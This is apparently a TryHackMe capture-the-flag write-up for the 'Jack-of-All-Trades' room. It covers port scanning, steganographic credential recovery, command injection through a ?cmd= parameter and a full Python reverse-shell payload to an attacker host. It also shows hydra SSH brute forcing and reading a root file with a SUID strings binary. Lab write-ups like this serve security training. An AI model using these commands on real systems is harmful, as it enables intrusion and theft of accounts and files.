Hello. I’m Rahmos. Here is my Jack-of-All-Trades — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports.
nmap -A -T4 -p- <ip>
Well there is something tricky here. Normally port 22 is for ssh, and port 80 is for http. But in this machine, it’s vice-versa.
So let’s access its website at port 22. Firefox will first block your request for security, cause it’s not the normal web server port. You can follow these steps to enable port 22 on Firefox:
1/ Type about:config in your address bar
2/ Right click -> New -> String
3/ Enter this name: network.security.ports.banned.override
4/ Enter port 22 and save
You will have the setting like this:
From now on, you can override any blocked port by modify this string to the port you want to access.
Now let’s get back to the website.
It’s always useful to check the page source. Press Ctrl+U to view page source.
Well you can see there are 4 things to focus on: 3 images, a hidden dir, and a encoded string.
First let’s see what’s inside the hidden folder: /recovery.php
Well it’s a login page. I guess the username is jack and the password is the encoded string above. Let’s use icyberchef.com to decode that string.
So it’s encoded with Base64. Now I have the password: u?WtKSraq
I tried to login with jack and the password, but it didn’t work. So let’s find another way.
It’s time for some stego. Download those 3 images and look for hidden data.
I will use steghide to extract hidden data
steghide extract -sf stego.jpg
Enter the password above and you will see the hidden data.
I cannot extract hidden data inside jackinthebox.jpg with that password so just skip it. Let’s see what’s inside the “creds.txt”.
Uh-oh!! 😣 That means we need to extract data inside another image.
There is only 1 image left, which is header.jpg.
steghide extract -sf header.jpg
Also use the password above.
Read the content of this hidden data.
Finally we have the credential! Let’s login to /recovery.php page.
It told us to give it a ‘cmd’, which means we use command injection.
First let’s try ls to list file inside home folder. Add ?cmd=ls+/home to the end of the url.
Well it worked. So let’s spawn a reverse shell.
Start a listener on your machine.
nc -lvnp 4444
Change the cmd:
?cmd=python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“your_host_ip”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
*Remember to change your_host_ip to your ip.
Now you have the shell on your machine.
cd to home folder and cat content of jacks_password_list
It’s a password list for user jack to access ssh. Let’s bruteforce that using hydra. Copy the pass list to a txt file.
hydra -l jack -P jack.txt ssh://<ip>:80
*I named the file jack.txt. So remember to change it to your file’s name.
Now I’ve found the valid password. Let’s SSH to the machine.
ssh email@example.com -p 80
Enter the password and we’re in!
Now cd to jack’s home and list file.
There is a user.jpg inside, and it will be our first flag. Get this image to your machine using scp
scp -P 80 jack@<machine_ip>:/home/jack/user.jpg /your_home_folder
Enter jack’s password and the picture will be transfer to your machine.
Open the image and get your first flag.
Now let’s get root to get the final flag inside /root folder.
First try sudo -l to see if Jack can run sudo on this machine.
Unfortunately, no! So let’s try another way. Use find to search for command with special SUID bit set.
find / -perm -u=s 2>/dev/null
Well there is strings command. We can use this to cat the /root/root.txt
First declare LFILE=/root/root.txt
Now get your final flag!